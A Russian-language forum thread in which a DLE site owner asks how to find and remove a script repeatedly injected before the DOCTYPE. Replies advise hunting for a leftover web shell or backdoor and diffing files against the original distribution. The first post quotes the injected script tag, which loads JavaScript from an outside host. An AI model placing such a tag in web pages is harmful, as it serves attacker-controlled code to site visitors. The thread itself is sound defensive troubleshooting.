Перейти к публикации

Рекомендованные сообщения

Доброй ночи.

Уже не первый раз внедряется вредоносный код на сайт. В прошлый раз решил проблему обновлением до актуальной версии, а сейчас опять та же ерунда. Пароли фтп регулярно меняются, в фтп клиенте не сохраняются. Код внедряется до Доктайпа и имеет вид:


<script src="http://gfgrhtr.oTZO.com/showforum.php?pid=54543" type="text/javascript"></script>

В файлах шаблона его нету. Как его можно найти и удалить, и как предотвратить появление подобной проблемы в дальнейшем.

Речь идёт о сайте, лицензия для которого куплена и окончание JVWNT (в паблике сайт светить не хочу), если надо, в личку кину адрес сайта.

Ссылка на сообщение
Поделиться на других сайтах

Вам модифицируют файлы скрипта, это может быть любой файл. DLE этого не может сделать, значит у вас где то шелл на сервере, возможно остался от предыдущего раза. Вам нужно найти шелл на сервере. Это может быть любой скрипт, не имеющий отношения к стандартным файлам DLE. или внедренный бекдор в файлы скрипта, например файлы в папке engine/data/ не изменяются при обновлении.

Ссылка на сообщение
Поделиться на других сайтах

Вам модифицируют файлы скрипта, это может быть любой файл. DLE этого не может сделать, значит у вас где то шелл на сервере, возможно остался от предыдущего раза. Вам нужно найти шелл на сервере. Это может быть любой скрипт, не имеющий отношения к стандартным файлам DLE. или внедренный бекдор в файлы скрипта, например файлы в папке engine/data/ не изменяются при обновлении.

С этим понятно, спасибо. А как можно найти и убрать строчку подключаемого JS? Поиск по всем файлам сайта не помог, по датам изменения файлов тоже ничего не выявилось, в базе тоже всё чисто.

Ссылка на сообщение
Поделиться на других сайтах

Поиск по всем файлам сайта не помог, по датам изменения файлов тоже ничего не выявилось, в базе тоже всё чисто.

Код может быть и зашифрован, а не в открытом виде. В данном случае нужно делать сравнение файлов на сервере в файлами из оригинального дистрибутива.

Ссылка на сообщение
Поделиться на других сайтах

Поиск по всем файлам сайта не помог, по датам изменения файлов тоже ничего не выявилось, в базе тоже всё чисто.

Код может быть и зашифрован, а не в открытом виде. В данном случае нужно делать сравнение файлов на сервере в файлами из оригинального дистрибутива.

Ок, перефразирую вопрос: какие файлы движка могут подставлять что-то в шаблон до Доктайпа? Все ведь файлы сравнить не представляется возможным, поэтому хотелось бы сузить круг подозреваемых файлов. И ещё - вредоносный код виден ТОЛЬКо для неавторизованных пользователей.

Ссылка на сообщение
Поделиться на других сайтах

какие файлы движка могут подставлять что-то в шаблон до Доктайпа?

Любые. Они все выполняются на сервере, до вывода шаблона в браузер.

Все ведь файлы сравнить не представляется возможным, поэтому хотелось бы сузить круг подозреваемых файлов.

Вообще то для этого существуют специальные программы, которые позволяют это сделать за секунду в один клик, подобные вещи не вручную делаются.

Ссылка на сообщение
Поделиться на других сайтах

какие файлы движка могут подставлять что-то в шаблон до Доктайпа?

Любые. Они все выполняются на сервере, до вывода шаблона в браузер.

Все ведь файлы сравнить не представляется возможным, поэтому хотелось бы сузить круг подозреваемых файлов.

Вообще то для этого существуют специальные программы, которые позволяют это сделать за секунду в один клик, подобные вещи не вручную делаются.

Знаком с пофайловым сравнением кода, может посоветуете какой либо софт для пакетного сравнения?
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...